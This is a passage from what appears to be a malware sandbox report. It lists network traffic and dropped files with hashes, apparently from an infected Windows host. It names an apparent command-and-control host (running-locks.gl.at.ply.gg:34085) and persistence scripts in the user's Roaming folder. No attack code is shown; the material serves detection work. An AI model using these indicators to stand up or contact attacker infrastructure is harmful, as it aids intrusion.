| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 185.199.109.133:443 | avatars.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | beacons4.gvt2.com | udp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | tcp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| GB | 172.217.169.42:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | 154.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.32.239.216.in-addr.arpa | udp |
| US | 140.82.112.21:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 172.217.169.42:443 | content-autofill.googleapis.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 21.112.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.117.168.52.in-addr.arpa | udp |
| US | 147.185.221.22:34085 | running-locks.gl.at.ply.gg | tcp |
| US | 147.185.221.22:34085 | running-locks.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.178.14:443 | clients2.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.179.228:443 | www.google.com | udp |
| US | 8.8.8.8:53 | id.google.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 172.217.169.35:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | dns-tunnel-check.googlezip.net | udp |
| US | 216.239.34.157:443 | tunnel.googlezip.net | tcp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| GB | 142.250.178.22:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | 2.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 142.250.187.238:443 | www.youtube.com | udp |
| GB | 142.250.187.238:443 | www.youtube.com | tcp |
| GB | 142.250.187.238:443 | www.youtube.com | udp |
| US | 216.239.34.157:443 | tunnel.googlezip.net | tcp |
| GB | 142.250.187.238:443 | www.youtube.com | tcp |
| GB | 142.250.178.22:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | encrypted-vtbn0.gstatic.com | udp |
| GB | 142.250.180.14:443 | encrypted-vtbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| GB | 172.217.169.66:443 | googleads.g.doubleclick.net | udp |
| GB | 142.250.180.14:443 | encrypted-vtbn0.gstatic.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| GB | 142.250.178.6:443 | static.doubleclick.net | udp |
| GB | 172.217.169.66:443 | googleads.g.doubleclick.net | tcp |
| GB | 142.250.200.14:443 | play.google.com | udp |
| GB | 216.58.213.10:443 | jnn-pa.googleapis.com | udp |
| GB | 142.250.200.14:443 | play.google.com | tcp |
| GB | 216.58.213.10:443 | jnn-pa.googleapis.com | tcp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.169.217.172.in-addr.arpa | udp |
| GB | 142.250.200.14:443 | play.google.com | udp |
| GB | 142.250.200.14:443 | play.google.com | tcp |
| GB | 142.250.200.14:443 | play.google.com | udp |
| GB | 142.250.200.14:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 216.58.201.106:443 | content-autofill.googleapis.com | udp |
| GB | 216.58.201.106:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 140.82.112.21:443 | collector.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 106.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | codeload.github.com | udp |
| GB | 20.26.156.216:443 | codeload.github.com | tcp |
| US | 8.8.8.8:53 | 216.156.26.20.in-addr.arpa | udp |
| N/A | 127.0.0.1:58765 | tcp | |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | firefox-api-proxy.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 34.149.97.1:443 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | tcp |
| US | 8.8.8.8:53 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 34.149.97.1:443 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| N/A | 127.0.0.1:58775 | tcp | |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 172.217.169.35:443 | beacons.gcp.gvt2.com | tcp |
| GB | 172.217.169.35:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | 255.254.81.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | location.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 35.190.72.216:443 | location.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 35.190.72.216:443 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | 216.72.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.181.244.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | ciscobinary.openh264.org | udp |
| GB | 172.217.169.14:443 | redirector.gvt1.com | tcp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 88.221.134.209:80 | ciscobinary.openh264.org | tcp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| GB | 172.217.169.14:443 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | r1---sn-aigzrnsr.gvt1.com | udp |
| GB | 74.125.175.38:443 | r1---sn-aigzrnsr.gvt1.com | tcp |
| US | 8.8.8.8:53 | r1.sn-aigzrnsr.gvt1.com | udp |
| US | 8.8.8.8:53 | r1.sn-aigzrnsr.gvt1.com | udp |
| GB | 74.125.175.38:443 | r1.sn-aigzrnsr.gvt1.com | udp |
| US | 8.8.8.8:53 | 14.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.175.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.179.228:443 | www.google.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 142.250.200.14:443 | play.google.com | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 172.217.169.66:443 | googleads.g.doubleclick.net | udp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| GB | 216.58.201.110:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 216.58.201.110:443 | encrypted-tbn0.gstatic.com | tcp |
| US | 8.8.8.8:53 | encrypted-tbn1.gstatic.com | udp |
| GB | 216.58.201.110:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 216.58.201.110:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 216.58.201.110:443 | encrypted-tbn0.gstatic.com | tcp |
| US | 8.8.8.8:53 | encrypted-tbn2.gstatic.com | udp |
| GB | 142.250.178.14:443 | encrypted-tbn1.gstatic.com | tcp |
| GB | 172.217.16.238:443 | encrypted-tbn2.gstatic.com | tcp |
| US | 8.8.8.8:53 | 110.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 140.82.112.21:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | udp |
| GB | 142.250.179.238:443 | www.youtube.com | udp |
| US | 216.239.34.157:443 | tunnel.googlezip.net | tcp |
| GB | 142.250.178.22:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | 238.179.250.142.in-addr.arpa | udp |
| US | 216.239.34.157:443 | tunnel.googlezip.net | tcp |
| GB | 142.250.179.238:443 | www.youtube.com | udp |
| GB | 142.250.178.22:443 | i.ytimg.com | tcp |
| GB | 172.217.169.66:443 | googleads.g.doubleclick.net | udp |
| GB | 216.58.213.10:443 | content-autofill.googleapis.com | udp |
| GB | 142.250.200.14:443 | www.youtube.com | udp |
| GB | 142.250.200.14:443 | www.youtube.com | udp |
| GB | 142.250.180.14:443 | www.youtube.com | udp |
| US | 216.239.34.157:443 | tunnel.googlezip.net | tcp |
| US | 216.239.34.157:443 | tunnel.googlezip.net | tcp |
| GB | 142.250.200.14:443 | www.youtube.com | udp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.178.14:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | ogs.google.com | udp |
| GB | 172.217.169.14:443 | ogs.google.com | tcp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| US | 8.8.8.8:53 | www.researchgate.net | udp |
| US | 104.17.33.105:443 | www.researchgate.net | tcp |
| GB | 142.250.179.228:443 | www.google.com | udp |
| US | 104.17.33.105:443 | www.researchgate.net | tcp |
| US | 104.17.33.105:443 | www.researchgate.net | udp |
| US | 8.8.8.8:53 | challenges.cloudflare.com | udp |
| US | 104.18.94.41:443 | challenges.cloudflare.com | tcp |
| US | 104.18.94.41:443 | challenges.cloudflare.com | tcp |
| US | 8.8.8.8:53 | 41.94.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.33.17.104.in-addr.arpa | udp |
| US | 104.18.94.41:443 | challenges.cloudflare.com | udp |
Files
memory/4388-0-0x00007FF8F58D3000-0x00007FF8F58D5000-memory.dmp
memory/4388-2-0x00000264D2AF0000-0x00000264D2B12000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cwnjf3gg.jpg.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4388-11-0x00007FF8F58D0000-0x00007FF8F6391000-memory.dmp
memory/4388-12-0x00007FF8F58D0000-0x00007FF8F6391000-memory.dmp
memory/4388-13-0x00000264BAAD0000-0x00000264BAAD8000-memory.dmp
memory/4388-14-0x00000264D2B40000-0x00000264D2B7E000-memory.dmp
memory/4224-25-0x00007FF8F58D0000-0x00007FF8F6391000-memory.dmp
memory/4224-26-0x00007FF8F58D0000-0x00007FF8F6391000-memory.dmp
memory/4224-29-0x00007FF8F58D0000-0x00007FF8F6391000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 773440cd6eb4e778c7d2115d1f231f75 |
| SHA1 | 4b600aa41fcd267817961c95b104a0717c40e558 |
| SHA256 | 64c178f2a2edc319c244fa885951e0425ad172e0c9c18d9773069fa13a44385c |
| SHA512 | af0370eb22d7153b7b71a033f56bc08796a0be9a1aa0f479585e03e099a215114f6ac059cf588999f3be36d91bc38ec64b0695071292db8e324ee7bcd505ee35 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 661739d384d9dfd807a089721202900b |
| SHA1 | 5b2c5d6a7122b4ce849dc98e79a7713038feac55 |
| SHA256 | 70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf |
| SHA512 | 81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8 |
C:\Users\Admin\AppData\Roaming\startup_str_569.vbs
| MD5 | 097b1d8324abe27ef38de35f3ee9d912 |
| SHA1 | 9ca3a69d01bc07a44b9ee2ae70bc73927486b8a8 |
| SHA256 | 80ab9811340725b35b90bbf40470d6c27827c9d16a704fcbd5184bdb992762d3 |
| SHA512 | 9b4e662f799ee26878c3b1c241809921953dd4d32d4a9ab2595f4762cb13921578772a6f25053e12e53833e9863e98c686fccfa36154a0cb708740aad22cd8e2 |
C:\Users\Admin\AppData\Roaming\startup_str_569.bat
| MD5 | 58507a2c740eb9251ee878ce7f25b72a |
| SHA1 | d9702407c6390f65e5cff7c0c331352f5bfc52b8 |
| SHA256 | b1e02899752b3e45311d824e70bed91652fcfae6ad24e42a8cd91741def5af92 |
| SHA512 | be89349449467532f042789601dca41356944f9ae899c7a7725bc077608c37afc35a43cac9b8d92db437f1eae3da533dcc3cc1a39e8437dacd75842e5b5f9131 |
memory/3032-48-0x0000026EF1E00000-0x0000026EF1E5A000-memory.dmp
memory/4388-49-0x00007FF8F58D0000-0x00007FF8F6391000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d28a889fd956d5cb3accfbaf1143eb6f |
| SHA1 | 157ba54b365341f8ff06707d996b3635da8446f7 |
| SHA256 | 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45 |
| SHA512 | 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 22310ad6749d8cc38284aa616efcd100 |
| SHA1 | 440ef4a0a53bfa7c83fe84326a1dff4326dcb515 |
| SHA256 | 55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf |
| SHA512 | 2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def |
C:\Users\Admin\AppData\Local\Temp\dxipfm.exe
| MD5 | 35a27d088cd5be278629fae37d464182 |
| SHA1 | d5a291fadead1f2a0cf35082012fe6f4bf22a3ab |
| SHA256 | 4a75f2db1dbd3c1218bb9994b7e1c690c4edd4e0c1a675de8d2a127611173e69 |
| SHA512 | eb0be3026321864bd5bcf53b88dc951711d8c0b4bcbd46800b90ca5116a56dba22452530e29f3ccbbcc43d943bdefc8ed8ca2d31ba2e7e5f0e594f74adba4ab5 |
C:\Users\Admin\AppData\Local\Temp\3F17.tmp\3F18.tmp\3F19.vbs
| MD5 | 3b8696ecbb737aad2a763c4eaf62c247 |
| SHA1 | 4a2d7a2d61d3f4c414b4e5d2933cd404b8f126e5 |
| SHA256 | ce95f7eea8b303bc23cfd6e41748ad4e7b5e0f0f1d3bdf390eadb1e354915569 |
| SHA512 | 713d9697b892b9dd892537e8a01eab8d0265ebf64867c8beecf7a744321257c2a5c11d4de18fcb486bb69f199422ce3cab8b6afdbe880481c47b06ba8f335beb |
C:\Users\Admin\AppData\Local\Temp\3F17.tmp\eulascr.exe
| MD5 | 8b1c352450e480d9320fce5e6f2c8713 |
| SHA1 | d6bd88bf33de7c5d4e68b233c37cc1540c97bd3a |
| SHA256 | 2c343174231b55e463ca044d19d47bd5842793c15954583eb340bfd95628516e |
| SHA512 | 2d8e43b1021da08ed1bf5aff110159e6bc10478102c024371302ccfce595e77fd76794658617b5b52f9a50190db250c1ba486d247d9cd69e4732a768edbb4cbc |
memory/3416-115-0x00000000001A0000-0x00000000001CA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\5a530dfd-bc51-4992-a05d-f09d41a331d4\AgileDotNetRT64.dll
| MD5 | 42b2c266e49a3acd346b91e3b0e638c0 |
| SHA1 | 2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1 |
| SHA256 | adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29 |
| SHA512 | 770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81 |
memory/3416-122-0x00007FF8EF780000-0x00007FF8EF8CE000-memory.dmp
memory/3416-123-0x000000001D2D0000-0x000000001D492000-memory.dmp
memory/3416-124-0x000000001D9D0000-0x000000001DEF8000-memory.dmp
C:\Users\Admin\AppData\Roaming\System User
| MD5 | 04029e121a0cfa5991749937dd22a1d9 |
| SHA1 | f43d9bb316e30ae1a3494ac5b0624f6bea1bf054 |
| SHA256 | 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f |
| SHA512 | 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b |
memory/1744-135-0x000002123BC00000-0x000002123BC44000-memory.dmp
memory/1744-136-0x000002123C030000-0x000002123C0A6000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\eulascr.exe.log
| MD5 | 8b325485d0cc4762f87c0857e27c0e35 |
| SHA1 | 1514778327d7c7b705dbf14f22ff9d8bdfdca581 |
| SHA256 | c18709d3ab63bebbbeba0791cd188db4121be8007c896a655d7f68535026cadf |
| SHA512 | 9bf9da14e50301d68246dc9f3a21319a8fbfc866d5b57ee44cd9ed96c1a6dfecabcec06b66be5ec5625ff708d460e23d00849c581957ab84c4f2941cee07ff33 |
memory/1712-166-0x00007FF8EF780000-0x00007FF8EF8CE000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\System User.log
| MD5 | 3f01549ee3e4c18244797530b588dad9 |
| SHA1 | 3e87863fc06995fe4b741357c68931221d6cc0b9 |
| SHA256 | 36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a |
| SHA512 | 73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | e6c8a4d7101d1da04cb132eee993981e |
| SHA1 | 210206318aa7d49c9123af4e45d26eba08e48705 |
| SHA256 | 40e277f8af510037e3f3b536085e3eb04c0471dbddc15b1ba4dfa817375fb94b |
| SHA512 | 6ff1de3526f4de8666c5cfd5bf0421f1c59af932d9d192f01862026ad52596fb8ce22ed2982dfde7a3bb0275b5afa0de97e2183620819a1dba22a5bd1ef495f8 |
\??\pipe\crashpad_2732_LVRYUALHCJVTQRWC
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
| MD5 | 43f76aff474aad9acc2c77286b6542e4 |
| SHA1 | 87167b13054b6233326bb0c6c2af078aef117371 |
| SHA256 | a355fbbca528292903aa7598b19c378288d97bd18268c62adeeff97b68aaad9d |
| SHA512 | 0f97057b286d1d2dc608e90a106b35f80af194595060f3e44fb482e3f5eb5194ad609295867ef081df3926c0f2dbc07717467f3d7cf6754e4c21436ed4db5701 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 60dc1aba5aeb5c27e09256723d6a8bd2 |
| SHA1 | 164942e62296149b3935a744667e1948d31a6556 |
| SHA256 | 4696759171c79c70496bfa97df4c4ce5452a51481adfaca7ea445e91ded545c6 |
| SHA512 | 0b55b5136791a4b552b9aca0cdc61b45f421a4ec336c4fb8d4e2bf1cf665e4f9b084063ea8a59f84d045999b751204319775b6ca3dcff0631284f1435aff82f7 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 40120992b3791e9a4865e987076d8d07 |
| SHA1 | 70630d715ea52794676d73487f6539d4bd23d585 |
| SHA256 | e802549d77a4447366dd9e36318f62184153f85b3122ee8c028ffceac1723208 |
| SHA512 | 1620c4da6f199959e7da31cd34ef1c15938d4a65e79270614078b28c372da87689ab1c10a95f74b748a9dfef8b89b8c7d54a66142311e53ce5223417729e6be2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 054b789f3f733cacc1a8da9c759cdb4e |
| SHA1 | 764d2b9b4ce9ab341dc7a9e7a779b0f302c12846 |
| SHA256 | 96b923f8d94b393dca1a4184f4576724f05b84cc91a36bb81ada0a7e2055f7ef |
| SHA512 | 8614b69cc90f26669a2f25c13e9d260757a343a05bf84b5a3f458c093be776f10640126f2d46628adad56e51e8a971537499c6df2ffea257dc85b88b025f12a6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000001
| MD5 | e7226392c938e4e604d2175eb9f43ca1 |
| SHA1 | 2098293f39aa0bcdd62e718f9212d9062fa283ab |
| SHA256 | d46ec08b6c29c4ca56cecbf73149cc66ebd902197590fe28cd65dad52a08c4e1 |
| SHA512 | 63a4b99101c790d40a813db9e0d5fde21a64ccaf60a6009ead027920dbbdb52cc262af829e5c4140f3702a559c7ac46efa89622d76d45b4b49a9ce01625ef145 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | c570af4616ad21bae98767f773ac07fe |
| SHA1 | ec5792990076d73bce1ce62a26290e7c0e1f356c |
| SHA256 | bbe51ba996df14b9afdfd1ccc5d947a6b9ce4f05174194167ad8e7c8fc754fd9 |
| SHA512 | 19697316545dd3b659aa1121332628ddc010b685afd10f81979d2267558d6be010235cde2909e8cf1646929a4baf8064bf46b655c47920b3f67d8cf635e4fe89 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | fc3f47a93076f81718e0849a9fd4104b |
| SHA1 | 9d34d934f3938a5b7b44c6594fef75998ec182f5 |
| SHA256 | 692fd0eedd48df9303ee21861ef15aa1b3eeaeb33d525011d8e315e745de5be0 |
| SHA512 | ebd4e28700ed78008d3380f5b3979bd56f543c1d83428f525134f7e1da22d6c0fbdf239efe9e5adaedaa2a2ef0b8c8a46239621d405af4e1fa281283bef99500 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\15f3b65f-96e0-49c4-91db-b76c4650795c.tmp
| MD5 | 51543520fca4c74e0ce08f8d88b431fa |
| SHA1 | a98f4c98d4551d8e19610e1c92d330cfef144e71 |
| SHA256 | 733ee3640f1fb5f1f963139253b281122a3de58de77aa19a95664127bc66c433 |
| SHA512 | 93597bdf55e2e494450d45bf59b589516ef9bb7498480a735d5bcd70b73c1c909b6ccc57b237915a30aa5295a1b6b4dfe5de79e32563d736978b0a8b09335547 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 8cd5276d6ad21d529438c0ef08853beb |
| SHA1 | c7e947c3b4657097fe26685b89765e66697be870 |
| SHA256 | 06c915c78eb4b15b2b493a5b631953cc0b0914a92fc35c221a1d7366f1177a24 |
| SHA512 | e2bd0d70e062cf7a1a3d19db69776d26323e5b26a6f94f3a88c0ffc9487567e22e8d2c1f0991aa9df74f0c81238ad9ef912cb8a9eae3b00ad882878727a637df |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | ad82327f5963f24c8965db2f79fa0b4a |
| SHA1 | 8bc80b1ddd00b9f7ae48e82755e21214aa883e71 |
| SHA256 | 00bfacf5ae9fe1fc349bc8b798a4fb367e44590235194eaddcb0ae06ff3ffffd |
| SHA512 | ee627d75285d911cdb47130d523a7eac686423a368700f5207755e8b74958a005df5aac9d8f445ecbbb4af1775f420e057fb830718014b24de1572d194ccbe79 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 98a344b657889c1ff49a4e2ee2177cfb |
| SHA1 | 0c75d00a813911bcc01eec60ad6c0082594c94f2 |
| SHA256 | 84fcf8a8e3a4d564b06a783a2d01886e7e3ac1acc854d32ba2ba4500e1866261 |
| SHA512 | 24a331dfebc93cdf318cbaafda0b68d34c90505ea5ed29fc0e0530699473c2a6049a3979f169c7725dc30ed49bb93934cb8d7c3b321552d33dc34aa712ae2705 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | a42a3b39b2a9efe8f6a941123c602755 |
| SHA1 | 41c89760bf0ea8564cae7e151b42a86ee13435cc |
| SHA256 | 62fde3021baef3561399068368f7cd76c3595a210c68bdbd931d154217998ae7 |
| SHA512 | 997e751221fea72b63a82d5ef6a78ff3c937cab85336c134c56531e4e4b249c322ba32726cbb9376440f8d16b657c731ad37a60701735688bba50ee24d83534a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 7267aee3ea863450904383b6a8ed2601 |
| SHA1 | 113bba504f3f4821e47146109a2b41b9e703cd20 |
